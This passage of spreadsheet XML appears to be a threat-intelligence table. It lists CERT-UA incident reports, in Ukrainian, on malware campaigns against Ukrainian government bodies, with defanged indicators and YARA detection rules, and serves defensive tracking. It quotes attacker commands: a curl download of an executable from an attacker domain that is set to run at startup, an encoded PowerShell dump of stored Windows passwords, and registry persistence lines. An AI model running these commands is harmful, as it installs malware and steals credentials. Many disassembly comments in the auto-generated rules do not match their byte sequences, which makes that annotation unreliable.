            //   c7430cffffffff       | dec                 esp
            //   85ff                 | lea                 eax, dword ptr [ebx + 0x28]
            //   0f8efc000000         | jne                 0x4a
            //   0f1f440000           | mov                 edx, 1
        $sequence_4 = { 8b8424f8000000 89742428 398424f0000000 8b442458 89442420 0f84fe080000 448b842488000000 }
            // n = 7, score = 100
            //   8b8424f8000000       | inc                 eax
            //   89742428             | movzx               edx, dh
            //   398424f0000000       | jmp                 0x351
            //   8b442458             | lea                 esi, dword ptr [edx - 0x41]
            //   89442420             | nop                 
            //   0f84fe080000         | inc                 eax
            //   448b842488000000     | cmp                 dh, 5
        $sequence_5 = { 754a 80b9a000000000 6690 753f 488d05d7153e00 e8???????? 48c7400850000000 }
            // n = 7, score = 100
            //   754a                 | cmp                 byte ptr [edx], 0xa4
            //   80b9a000000000       | dec                 eax
            //   6690                 | mov                 ebx, edx
            //   753f                 | je                  0x1f37
            //   488d05d7153e00       | xor                 eax, eax
            //   e8????????           |                     
            //   48c7400850000000     | dec                 eax
        $sequence_6 = { 498b07 4c89f9 ff5020 4c89e2 4c89e9 4883c428 415c }
            // n = 7, score = 100
            //   498b07               | dec                 ebp
            //   4c89f9               | imul                eax, eax, 0xa6f7d
            //   ff5020               | dec                 esp
            //   4c89e2               | sub                 eax, eax
            //   4c89e9               | dec                 edi
            //   4883c428             | lea                 eax, dword ptr [edi]
            //   415c                 | dec                 ebp
        $sequence_7 = { 898424e8000000 85c0 0f8534010000 488b0b 448b7914 4585ff 0f89b4feffff }
            // n = 7, score = 100
            //   898424e8000000       | jne                 0x4d
            //   85c0                 | dec                 eax
            //   0f8534010000         | lea                 edx, dword ptr [esp + 0xd0]
            //   488b0b               | mov                 ecx, 4
            //   448b7914             | jne                 0x65
            //   4585ff               | inc                 esp
            //   0f89b4feffff         | movzx               eax, byte ptr [ecx + 1]
        $sequence_8 = { eb2d 4889c8 4889fb 4889d1 e8???????? 83f001 488b4c2450 }
            // n = 7, score = 100
            //   eb2d                 | dec                 eax
            //   4889c8               | stosd               dword ptr es:[edi], eax
            //   4889fb               | dec                 eax
            //   4889d1               | mov                 dword ptr [esp + 0x30], 0
            //   e8????????           |                     
            //   83f001               | dec                 eax
            //   488b4c2450           | mov                 dword ptr [esp + 0x38], 0
        $sequence_9 = { b981000000 e8???????? 488d05673d5c00 bb1e000000 e8???????? 90 4889442408 }
            // n = 7, score = 100
            //   b981000000           | cmp                 ecx, edx
            //   e8????????           |                     
            //   488d05673d5c00       | je                  0xf8b
            //   bb1e000000           | dec                 eax
            //   e8????????           |                     
            //   90                   | lea                 edx, dword ptr [ecx + 1]
            //   4889442408           | cmp                 dl, 0x2e
    condition:
        7 of them and filesize &lt; 19812352
}
rule win_grimplant_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.grimplant."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant"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ffd1 488b4c2420 48f7c160000000 b900000000 ba20000000 480f45ca 4881c994000000 }
            // n = 7, score = 100
            //   ffd1                 | lea                 edi, dword ptr [eax + 0x18]
            //   488b4c2420           | dec                 eax
            //   48f7c160000000       | mov                 ecx, dword ptr [esp + 0x5b0]
            //   b900000000           | jne                 0xcd8
            //   ba20000000           | dec                 eax
            //   480f45ca             | mov                 ecx, dword ptr [esp + 0xb8]
            //   4881c994000000       | dec                 eax
        $sequence_1 = { eb1c 488b9424d8000000 488d4a01 488b8424c8000000 488b9c2418010000 48898c24d8000000 488b5028 }
            // n = 7, score = 100
            //   eb1c                 | mov                 ebx, 2
            //   488b9424d8000000     | mov                 ecx, 6
            //   488d4a01             | dec                 eax
            //   488b8424c8000000     | mov                 esi, dword ptr [esp + 0xa0]
            //   488b9c2418010000     | jge                 0xa0
            //   48898c24d8000000     | nop                 dword ptr [eax]
            //   488b5028             | dec                 eax
        $sequence_2 = { eb0e 488d3d22406e00 31c0 e8???????? 440f113d???????? 833d????????00 750d }
            // n = 7, score = 100
            //   eb0e                 | cmp                 byte ptr [eax], 0x31
            //   488d3d22406e00       | jne                 0x4d1
            //   31c0                 | jne                 0x1ad
            //   e8????????           |                     
            //   440f113d????????     |                     
            //   833d????????00       |                     
            //   750d                 | dec                 eax
        $sequence_3 = { 660f3a0fff08 66450f3a0fd20c 4c0317 4c135f08 4983d401 488b4500 4989c7 }
            // n = 7, score = 100
            //   660f3a0fff08         | mov                 dword ptr [esp + 0x18], edx
            //   66450f3a0fd20c       | dec                 eax
            //   4c0317               | lea                 edi, dword ptr [0x54a8d4]
            //   4c135f08             | nop                 dword ptr [eax]
            //   4983d401             | jmp                 0xa6b
            //   488b4500             | dec                 eax
            //   4989c7               | lea                 edx, dword ptr [0xb1972]
        $sequence_4 = { 4c8d4e01 6690 4c39cf 7334 488d05143c3300 4c89c3 4889f1 }
            // n = 7, score = 100
            //   4c8d4e01             | jne                 0x12ed
            //   6690                 | dec                 eax
            //   4c39cf               | mov                 ecx, dword ptr [esp + 0x28]
            //   7334                 | dec                 eax
            //   488d05143c3300       | mov                 eax, dword ptr [esp + 0x30]
            //   4c89c3               | dec                 eax
            //   4889f1               | lea                 ecx, dword ptr [0x45cfe0]
        $sequence_5 = { e9???????? 488d05bc6d1700 e8???????? 488d0db0022800 488908 833d????????00 750e }
            // n = 7, score = 100
            //   e9????????           |                     
            //   488d05bc6d1700       | dec                 eax
            //   e8????????           |                     
            //   488d0db0022800       | mov                 eax, ecx
            //   488908               | dec                 eax
            //   833d????????00       |                     
            //   750e                 | lea                 ecx, dword ptr [0x535463]
        $sequence_6 = { ffd6 488b4c2460 488b8980000000 488b442468 31db 31ff 4889ca }
            // n = 7, score = 100
            //   ffd6                 | dec                 eax
            //   488b4c2460           | mov                 dword ptr [eax + 0x30], edx
            //   488b8980000000       | jmp                 0x1241
            //   488b442468           | dec                 eax
            //   31db                 | lea                 edi, dword ptr [eax + 0x30]
            //   31ff                 | nop                 
            //   4889ca               | jne                 0x1245
        $sequence_7 = { e9???????? 4889c8 4889fb 4889d1 e8???????? 488b4c2478 4839cb }
            // n = 7, score = 100
            //   e9????????           |                     
            //   4889c8               | dec                 eax
            //   4889fb               | mov                 edi, dword ptr [esp + 0x18]
            //   4889d1               | dec                 eax
            //   e8????????           |                     
            //   488b4c2478           | cmp                 dword ptr [edx + 0x10], 0
            //   4839cb               | jne                 0x97d
        $sequence_8 = { eb0d 4889c7 488b4c2428 e8???????? 31c0 31db 488b6c2448 }
            // n = 7, score = 100
            //   eb0d                 | lea                 eax, dword ptr [0x1f4d97]
            //   4889c7               | dec                 eax
            //   488b4c2428           | mov                 dword ptr [eax + 8], 0x50
            //   e8????????           |                     
            //   31c0                 | jne                 0x33d
            //   31db                 | nop                 
            //   488b6c2448           | dec                 eax
        $sequence_9 = { e9???????? 4889d6 e8???????? 488b4c2458 4839c8 773e 488b742450 }
            // n = 7, score = 100
            //   e9????????           |                     
            //   4889d6               | dec                 eax
            //   e8????????           |                     
            //   488b4c2458           | mov                 ecx, dword ptr [esp + 0x20]
            //   4839c8               | dec                 eax
            //   773e                 | lea                 edi, dword ptr [ecx + 0x40]
            //   488b742450           | jne                 0xb6e
    condition:
        7 of them and filesize &lt; 19940352
}</t>
  </si>
  <si>
    <t>Отримано інформацію щодо розповсюдження електронних листів з темою "Заборгованість по зарплаті" серед державних органів України. У додатку до листа знаходиться документ "Заборгованість по зарплаті.xls", який містить легітимні статистичні дані та макрос. Разом з тим, до згаданого документу у вигляді вкладення додано hex-кодовані дані. Макрос, після активації, здійснить декодування даних, створення EXE-файлу "Base-Update.exe" на комп'ютері та його виконання.
Згаданий файл є програмою-завантажувачем, розробленою з використанням мови програмування GoLang. Програма здійснить завантаження і запуск іншого завантажувача, який, у свою чергу, забезпечить завантаження і запуск на комп'ютері шкідливих програм GraphSteel та GrimPlant.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/38374</t>
  </si>
  <si>
    <t>CERT-UA#4227</t>
  </si>
  <si>
    <t>UNC1151 (UAC-0051);Belarus APT</t>
  </si>
  <si>
    <t>Unknown</t>
  </si>
  <si>
    <t>Диверсанти; ua</t>
  </si>
  <si>
    <t>SFX-archive, VBScript, .NET-program, Cobalt Strike Beacon</t>
  </si>
  <si>
    <t>rar, db, com, exe, bin</t>
  </si>
  <si>
    <t>hXXps://ao3.hmgo[.]pw/tags/Akihabara@TODEEP/works
hXXps://ao3.hmgo[.]pw/tags/Akihabara@TODEEP/works/update
ao3.hmgo[.]pw
hmgo[.]pw</t>
  </si>
  <si>
    <t>C:\Users\Public\dhdhk0k34.com
C:\Users\Public\Skype.exe</t>
  </si>
  <si>
    <t>Виявлено RAR-архів "Диверсанти.rar", що містить RAR-архів "Диверсанти 21.03.rar", який, у свою чергу, містить SFX-архів "Диверсанти filercs.rar" (для маскування розширення ім'я файлу містить right-to-left override (RTLO) символ).
Згаданий архів містить документи та зображення приманки, а також VBScript-код (Thumbs.db), який забезпечить створення та запуск .NET-програми "dhdhk0k34.com". В результаті комп'ютер буде уражено шкідливою програмою Cobalt Strike Beacon. Зауважимо, що дата компіляції інжектору "inject.exe" - 15.03.2022</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/38155</t>
  </si>
  <si>
    <t>CERT-UA#4244</t>
  </si>
  <si>
    <t>Scarab (UAC-0026);China APT</t>
  </si>
  <si>
    <t>Відеоматеріали, росія, Військові, Злочин; ua</t>
  </si>
  <si>
    <t>HeaderTip</t>
  </si>
  <si>
    <t>rar, exe, pdf, bat, dat, dll</t>
  </si>
  <si>
    <t>Gained access to download and execute other malware</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
hxxps://product2020.mrbasic[.]com:8080
product2020.mrbasic[.]com
104[.]155.198.25</t>
  </si>
  <si>
    <t>%TMP%\#2163_02_33-2022.pdf
%TMP%\officecleaner.bat
%TMP%\officecleaner.dat
%TMP%\officecleaner.dll
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\httpsrvlog
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\httpshelper
c:\windows\system32\rundll32.exe %TMP%\httpshelper.dll,OAService</t>
  </si>
  <si>
    <t>rule HeaderTip{
      meta:
            description = "Detects HeaderTip"
            author = "BlackBerry Threat Research Team"
            date = "2022-04-06-"
  license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research &amp; Intelligence Team"
      strings:
            $s1 = "type %temp%\\officecleaner.dat &gt;&gt; %objfile%"
            $s2 = "product2020.mrbasic.com" wide
      condition:
            filesize &lt; 750KB and all of them
}</t>
  </si>
  <si>
    <t>Виявлено RAR-архів "Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar", який містить одноіменний EXE-файл. Запуск виконуваного файлу призведе до створення на комп'ютері документу-приманки "#2163_02_33-2022.pdf" (стосується листа Національної поліції України), а також DLL-файлу з видаленим MZ-заголовком "officecleaner.dat" та BAT-файлу "officecleaner.bat", що забезпечить формування коректного DLL-файлу, його запуск і запис в реєстр Windows для забезпечення персистентності.
Згаданий DLL-файл класифіковано як шкідливу програму HeaderTip, основним призначенням якої є завантаження та виконання інших DLL-файлів.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/38097</t>
  </si>
  <si>
    <t>CERT-UA#4243</t>
  </si>
  <si>
    <t>UAC-0088;Unknown</t>
  </si>
  <si>
    <t>Вірус, Небезпека; ru</t>
  </si>
  <si>
    <t xml:space="preserve">.NET-program, DoubleZero </t>
  </si>
  <si>
    <t>zip, exe</t>
  </si>
  <si>
    <t>Malware distribution, Unauthorised modification of information</t>
  </si>
  <si>
    <t>"02.02", "07.02"</t>
  </si>
  <si>
    <t>Deleted data</t>
  </si>
  <si>
    <t>Виявлено декілька ZIP-архівів, один з яких мав назву "Вирус... крайне опасно!!!.zip". Кожен з архівів містить обфусковану .NET-програму. В результаті проведеного аналізу виявлені програми класифіковано як DoubleZero - шкідлива програма-деструктор, розроблена з використанням мови програмування C#. Для знищення файлів використовує два способи: перезапис файлів нульовими блоками по 4096 байт (метод FileStream.Write) або ж за допомогою API-викликів NtFileOpen, NtFsControlFile (код: FSCTL_SET_ZERO_DATA). Спочатку здійснюється перезапис всіх несистемних файлів на всіх дисках. Після цього складається перелік системних файлів за маскою, здійснюється їхнє сортування та подальший перезапис у відповідній послідовності. Надалі знищуються гілки реєстру Windows: HKCU, HKU, HKLM, HKLM\BCD. Насамкінець комп'ютер вимикається.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/38088</t>
  </si>
  <si>
    <t>CERT-UA#4213</t>
  </si>
  <si>
    <t>InvisiMole (UAC-0035);Russia APT</t>
  </si>
  <si>
    <t>Інше; int</t>
  </si>
  <si>
    <t xml:space="preserve">lnk shortcut, NTA-file, VBScript, LoadEdge,TunnelMole (DNS backdoor), RC2CL </t>
  </si>
  <si>
    <t>zip, lnk, hta, doc, dll</t>
  </si>
  <si>
    <t>Stolen personal data, RCE, Operations with the file system, Deleted data</t>
  </si>
  <si>
    <t>hxxp://45[.]95.11.34:88/get[.]php?a=We4Qu6
hxxp://45[.]95.11.34:88/_[A-Z0-9]{12}_AZ
hxxp://45[.]95.11.34:88/_[A-Z0-9]{12}_BZ
hxxp://45[.]95.11.34:3000/test
45[.]95.11.34</t>
  </si>
  <si>
    <t>%TEMP%\501_25_103.doc.b2
%TEMP%\EdgeNotification.dll.b2
%TEMP%\501_25_103.doc
%TEMP%\EdgeNotification.dll
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Notification
cmd.exe /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v Notification /t REG_SZ /d "rundll32.exe "%TEMP%\EdgeNotification.dll", GetApplicationNotificationFact"
C:\1\Release\DLoad.pdb
G:\projects\demo_rt\x64\Release\service.pdb
G:\projects\demo_rt\Win32\Release\service.pdb
wmic memorychip get /format: list
wmic baseboard get /format: list
wmic os get /format:list
wmic cpu get /format: list</t>
  </si>
  <si>
    <t>Від суб'єкту координації отримано повідомлення про розповсюдження електронних листів серед державних органів України. У додатку до листа знаходиться архів "501_25_103.zip", що містить одноіменний файл-ярлик. У разі відкриття LNK-файлу на комп'ютер буде завантажено та виконано HTA-файл. Останній містить VBScript-код, який забезпечить завантаження і декодування файлу-приманки та шкідливої програми LoadEdge, яка, у свою чергу, повинна була б забезпечити ураження комп'ютера іншими шкідливими програмами з арсеналу групи: TunnelMole (DNS backdoor), RC2CL або іншими.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/37829</t>
  </si>
  <si>
    <t>CERT-UA#4207</t>
  </si>
  <si>
    <t>VERMIN (UAC-0020);Ukraine Hacking Collective</t>
  </si>
  <si>
    <t>Постачання; ua</t>
  </si>
  <si>
    <t>lnk shortcut, SPECTR</t>
  </si>
  <si>
    <t>rar, rtf, lnk, out, dat, exe, dll</t>
  </si>
  <si>
    <t>Spread the infection further</t>
  </si>
  <si>
    <t>hxxp://176[.]119.2.212/web/t/data.out
hxxp://getmod[.]host/DSGb3Y3X
hxxp://getmod[.]host/ThlAHy3S
hxxp://getmod[.]host/OcthdaLm
getmod[.]host (2019-07-12)
syncapp[.]host (2019-07-12)
netbin[.]host (2019-07-12)
stormpredictor[.]host
meteolink[.]host
176[.]119.2.212
176[.]119.2.214
176[.]119.5.194
176[.]119.5.195
AS58271</t>
  </si>
  <si>
    <t>HKCU\Software\Google\Chrome\NativeMessagingHosts\com.microsoft.browsersec\EncodedProfile
HKCU\Software\Google\Chrome\NativeMessagingHosts\com.microsoft.browsercli\EncodedProfile
%APPDATA%\Microsoft\ExcelCnv\1033\license.dat
%APPDATA%\Microsoft\ExcelCnv\1033\conhost.exe
ESET_OPINIONS (змінна середовища)
MSO (змінна середовища)
MS Office Add-In Install Task (заплановане завдання)</t>
  </si>
  <si>
    <t>Від Міністерства оборони України отримано повідомлення про розповсюдження електронних листів з темою "постачання" серед державних органів України. У додатку до листа знаходиться захищений паролем архів "ДВТПРОВТ.rar", який містить файл-ярлик "4222 ВП МОУ на лист ДВТПРОВТ від 09.03.22 403-5-1324.rtf.lnk" та EXE-файл з назвою "4222 ВП МОУ на лист ДВТПРОВТ від 09.03.22 403-5-1324.rtf", що буде виконаний у разі відкриття LNK-файлу.
В результаті атаки комп'ютер жертви буде уражено модульною шкідливою програмою SPECTR, що, серед іншого, включає: SPECTR.Usb, SPECTR.Shell, SPECTR.Fs, SPECTR.Info, SPECTR.Archiver та інші компоненти.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/37815</t>
  </si>
  <si>
    <t>CERT-UA#4622</t>
  </si>
  <si>
    <t>FancyBear/APT28 (UAC-0028);Russia APT</t>
  </si>
  <si>
    <t>Кібер, Атака; ua</t>
  </si>
  <si>
    <t xml:space="preserve">SFX-file, CredoMap_v2, HTTP POST, Pipedream </t>
  </si>
  <si>
    <t>rar, exe, dll</t>
  </si>
  <si>
    <t>mariachandran@ginaengg[.]com
69[.]16.243.33 (Received)
hxxps://eo2mxtqmeqzafqi.m.pipedream[.]net
eo2mxtqmeqzafqi.m.pipedream[.]net</t>
  </si>
  <si>
    <t>Від учасника інформаційного обміну отримано електронний лист з темою "Кібератака", надісланий, начебто, від імені CERT-UA із вкладенням у вигляді захищеного паролем RAR-архіву "UkrScanner.rar".
Встановлено, що згаданий архів містить одноіменний SFX-файл, який, у свою чергу, містить шкідливу програму CredoMap_v2. Відмінність цієї версії стілеру від попередньої полягає у використанні протоколу HTTP для ексфільтрації даних. За допомогою HTTP POST-запитів викрадені автентифікаційні дані надсилаються на веб-ресурс, розгорнутий на платформі Pipedream.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/40102</t>
  </si>
  <si>
    <t>CERT-UA#4625</t>
  </si>
  <si>
    <t>UAC-0104;Unknown</t>
  </si>
  <si>
    <t>Хімічна, Атака; ua</t>
  </si>
  <si>
    <t xml:space="preserve">Hidden macros, JesterStealer </t>
  </si>
  <si>
    <t>tachikawaobs@sv5206.xserver.jp
157[.]112.183.47
igshop[.]net (Скомпрометований веб-ресурс)
dcshost[.]net (Скомпрометований веб-ресурс)
marmaris.com[.]ua (Скомпрометований веб-ресурс)
autodoka.com[.]ua (Скомпрометований веб-ресурс)
lightnogu5owjjllyo4tj2sfos6fchnmcidlgo6c7e6fz2hgryhfhoyd[.]onion
wasabiwallet[.]online
ip-api[.]com (Легітимний сервіс)
hxxps://igshop[.]net/uploads/Map026.xlsb
hxxps://igshop[.]net/uploads/Map023.xlsb
hxxps://igshop[.]net/uploads/Map021.xlsb
hxxps://igshop[.]net/uploads/Updater-Microsoft.exe
hxxps://dcshost[.]net/mail/OfficeUpdaterNew.exe
hxxps://marmaris.com[.]ua/misc/Updater-Microsoft.exe
hxxps://autodoka.com[.]ua/extra/Updater-Microsoft.exe
hxxp://lightnogu5owjjllyo4tj2sfos6fchnmcidlgo6c7e6fz2hgryhfhoyd[.]onion/stealer/1026977440
hxxp://ip-api[.]com/json (Легітимний сервіс)
tcp://wasabiwallet[.]online:7777</t>
  </si>
  <si>
    <t>HKCU\SOFTWARE\kxialunboq\state</t>
  </si>
  <si>
    <t>{
     strings:
     	$s1 = "github.com/L1ghtM4n" ascii fullword
     	$s2 = "Jester" ascii fullword
     	$s3 = "BitcoinCore" wide fullword
     	$s4 = "[AnonFile]" wide fullword
     	$s5 = ".onion" wide fullword
     condition:
     	uint16(0) == 0x5A4D and all of ($s*)
}</t>
  </si>
  <si>
    <t>Виявлено факт масового розповсюдження електронних листів з тематикою "хімічної атаки" та посиланням на XLS-документ з макросом.
У разі відкриття документу та активації макросу, останній здійснить завантаження і запуск EXE-файлу, що, в подальшому, призведе до ураження комп'ютера шкідливою програмою JesterStealer. Зауважимо, що завантаження виконуваних файлів здійснюється зі скомпрометованих веб-ресурсів.
За функціоналом згадана програма є стілером, що забезпечує викрадення автентифікаційних та інших даних з Інтернет-браузерів, MAIL/FTP/VPN-клієнтів, криптовалютних гаманців, менеджерів паролів, месенджерів, ігрових програм тощо. Викрадені дані через статично визначені адреси проксі (в т.ч., в мережі TOR) передаються зловмиснику в Telegram. Також, реалізовано функціонал протидії аналізу (anti-VM/debug/sandbox). Механізм забезпечення пересистентності відсутній - після завершення роботи програма видаляється.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/40125</t>
  </si>
  <si>
    <t>CERT-UA#4193</t>
  </si>
  <si>
    <t>Пароль; ua</t>
  </si>
  <si>
    <t>QR-code, HTTP POST, Pipedream</t>
  </si>
  <si>
    <t xml:space="preserve"> "03.03", "07.01"</t>
  </si>
  <si>
    <t>hxxps://tinyurl[.]com/2p8kpb9v
hxxps://panelunregistertle-348.frge[.]io/
hxxps://eoy7zvsvn6xfcmy.m.pipedream[.]net
hxxps://eo9p1d2bfmioiot.m.pipedream[.]net/?usr=
hxxps://eoiw8lhjwuc3sh2.m.pipedream[.]net
panelunregistertle-348.frge[.]io
eo9p1d2bfmioiot.m.pipedream[.]net
eoiw8lhjwuc3sh2.m.pipedream[.]net
frge[.]io (2021-04-21)
pipedream[.]net (легітимний ресурс)</t>
  </si>
  <si>
    <t>Виявлено факт розповсюдження електронних листів що імітують повідомлення від UKR.NET та містять QR-код в якому закодовано URL-адресу, створену за допомогою одного з URL-shortener сервісів. У разі відвідування останньої буде здійснено перенаправлення на веб-сайт, що намагається імітувати сторінку зміни паролю UKR.NET. Введені користувачем дані за допомогою HTTP POST-запиту буде надіслано на веб-ресурс, розгорнутий зловмисниками на платформі Pipedream.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/37788</t>
  </si>
  <si>
    <t>CERT-UA#4145</t>
  </si>
  <si>
    <t>Інструкція, Інформаційна безпека; ua</t>
  </si>
  <si>
    <t>Malicious link via mail, Discord, Cobalt Strike Beacon, GraphSteel, GrimPlant, Themida, WebSocket, GraphQL, gRPC</t>
  </si>
  <si>
    <t>doc, exe</t>
  </si>
  <si>
    <t>Malware distribution, Phishing,Unauthorised access to information,Unauthorised modification of information</t>
  </si>
  <si>
    <t>"02.02", "03.03", "07.00"</t>
  </si>
  <si>
    <t>Stolen personal data, Remote control of the device,Operations with the file system, RCE</t>
  </si>
  <si>
    <t>hxxps://forkscenter[.]fr/BitdefenderWindowsUpdatePackage.exe
hxxps://forkscenter[.]fr/Sdghrt_umrj6/wisw.exe
hxxps://cdn.discordapp[.]com/attachments/947916997713358890/949948174636830761/one.exe
hxxps://cdn.discordapp[.]com/attachments/947916997713358890/949948174838165524/dropper.exe
hxxps://cdn.discordapp[.]com/attachments/947916997713358890/949978571680673802/cesdf.exe
hxxps://nirsoft[.]me/s/2MYmbwpSJLZRAtXRgNTAUjJSH6SSoicLPIrQl/field-keywords/
hxxps://nirsoft[.]me/nEDFzTtoCbUfp9BtSZlaq6ql8v6yYb/avp/amznussraps/
hxxp://45[.]84.0.116:443/i
hxxp://45[.]84.0.116:443/m
hxxp://45[.]84.0.116:443/p
ws://45[.]84.0.116:443/c
forkscenter[.]fr (2022-01-29)
nirsoft[.]me    (2022-02-17)
45[.]84.0.116
156[.]146.50.5
-hobot- (User-Agent)</t>
  </si>
  <si>
    <t>%TMP%\alt.exe
%PROGRAMDATA%\one.exe
%PROGRAMDATA%\dropper.exe
%USERPROFILE%\.java-sdk\java-sdk.exe
%USERPROFILE%\.java-sdk\oracle-java.exe
%USERPROFILE%\.java-sdk\microsoft-cortana.exe
%USERPROFILE%\AppData\Local\Temp\wisw.exe
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitdefenderControl.lnk
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Java-SDK
C:\Windows\System32\cmd.exe /C cd %USERPROFILE%\AppData\Local\Temp\ &amp; curl -O hxxps://forkscenter[.]fr/Sdghrt_umrj6/wisw.exe &amp; mklink %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitdefenderControl.lnk %USERPROFILE%\AppData\Local\Temp\wisw.exe
C:\Windows\System32\cmd.exe /C cd / &amp; dir /S &gt; %USERPROFILE%\AppData\Local\Temp\Rsjdjfvj.txt &amp; ipconfig /all &gt; %USERPROFILE%\AppData\Local\Temp\Rsjdrnjngfvj.txt
ipconfig /all
cmd /Q /C netsh wlan show profiles
netsh wlan show profiles
powershell /Q /C -encodedCommand WwB2AG8AaQBkAF0AWwBXAGkAbgBkAG8AdwBzAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAC4AUABhAHMAcwB3AG8AcgBkAFYAYQB1AGwAdAAsAFcAaQBuAGQAbwB3AHMALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMALABDAG8AbgB0AGUAbgB0AFQAeQBwAGUAPQBXAGkAbgBkAG8AdwBzAFIAdQBuAHQAaQBtAGUAXQA7ACQAdgBhAHUAbAB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABXAGkAbgBkAG8AdwBzAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAC4AUABhAHMAcwB3AG8AcgBkAFYAYQB1AGwAdAA7ACQAdgBhAHUAbAB0AC4AUgBlAHQAcgBpAGUAdgBlAEEAbABsACgAKQAgAHwAIAAlACAAewAgACQAXwAuAFIAZQB0AHIAaQBlAHYAZQBQAGEAcwBzAHcAbwByAGQAKAApADsAJABfAH0AIAB8ACAAUwBlAGwAZQBjAHQAIABVAHMAZQByAE4AYQBtAGUALAAgAFIAZQBzAG8AdQByAGMAZQAsACAAUABhAHMAcwB3AG8AcgBkACAAfAAgAEYAbwByAG0AYQB0AC0AVABhAGIAbABlACAALQBIAGkAZABlAFQAYQBiAGwAZQBIAGUAYQBkAGUAcgBzAA==
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() | % { $_.RetrievePassword();$_} | Select UserName, Resource, Password | Format-Table -HideTableHeaders</t>
  </si>
  <si>
    <t>rule win_graphsteel_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.graphsteel."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel"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8b8c2484000000 8d42ff 85c9 0f49c1 498b4d00 80796100 4189c3 }
            // n = 7, score = 100
            //   8b8c2484000000       | pop                 edi
            //   8d42ff               | pop                 ebp
            //   85c9                 | ja                  0xca
            //   0f49c1               | dec                 eax
            //   498b4d00             | mov                 esi, 0x3e01
            //   80796100             | add                 eax, 0x48000003
            //   4189c3               | bt                  esi, edx
        $sequence_1 = { ff15???????? 48c7434000000000 ff15???????? 4c8b4b30 b90a180000 c74424202ab30000 894320 }
            // n = 7, score = 100
            //   ff15????????         |                     
            //   48c7434000000000     | lea                 eax, dword ptr [0x3cc23b]
            //   ff15????????         |                     
            //   4c8b4b30             | dec                 eax
            //   b90a180000           | mov                 ebp, dword ptr [esp + 0xb8]
            //   c74424202ab30000     | dec                 eax
            //   894320               | add                 esp, 0xc0
        $sequence_2 = { eb0e 488d7848 488b4c2418 e8???????? 4889c3 488d05eebd4f00 488b6c2420 }
            // n = 7, score = 100
            //   eb0e                 | dec                 ecx
            //   488d7848             | mov                 ecx, dword ptr [edi + 0x50]
            //   488b4c2418           | mov                 eax, 2
            //   e8????????           |                     
            //   4889c3               | xor                 ebx, ebx
            //   488d05eebd4f00       | mov                 dword ptr [esp + 0x124], 0
            //   488b6c2420           | mov                 dword ptr [esp + 0xa0], 0
        $sequence_3 = { 8b430c 39f8 0f8fc5000000 c7430cffffffff 85ff 0f8efc000000 0f1f440000 }
            // n = 7, score = 100
            //   8b430c               | mov                 ecx, dword ptr [ebx + 0x10]
            //   39f8                 | dec                 eax
            //   0f8fc5000000         | mov                 ecx, dword ptr [ebx]
            //   c7430cffffffff       | dec                 esp
            //   85ff                 | lea                 eax, dword ptr [ebx + 0x28]
            //   0f8efc000000         | jne                 0x4a
            //   0f1f440000           | mov                 edx, 1
        $sequence_4 = { 8b8424f8000000 89742428 398424f0000000 8b442458 89442420 0f84fe080000 448b842488000000 }
            // n = 7, score = 100
            //   8b8424f8000000       | inc                 eax
            //   89742428             | movzx               edx, dh
            //   398424f0000000       | jmp                 0x351
            //   8b442458             | lea                 esi, dword ptr [edx - 0x41]
            //   89442420             | nop                 
            //   0f84fe080000         | inc                 eax
            //   448b842488000000     | cmp                 dh, 5
        $sequence_5 = { 754a 80b9a000000000 6690 753f 488d05d7153e00 e8???????? 48c7400850000000 }
            // n = 7, score = 100
            //   754a                 | cmp                 byte ptr [edx], 0xa4
            //   80b9a000000000       | dec                 eax
            //   6690                 | mov                 ebx, edx
            //   753f                 | je                  0x1f37
            //   488d05d7153e00       | xor                 eax, eax
            //   e8????????           |                     
            //   48c7400850000000     | dec                 eax
        $sequence_6 = { 498b07 4c89f9 ff5020 4c89e2 4c89e9 4883c428 415c }
            // n = 7, score = 100
            //   498b07               | dec                 ebp
            //   4c89f9               | imul                eax, eax, 0xa6f7d
            //   ff5020               | dec                 esp
            //   4c89e2               | sub                 eax, eax
            //   4c89e9               | dec                 edi
            //   4883c428             | lea                 eax, dword ptr [edi]
            //   415c                 | dec                 ebp
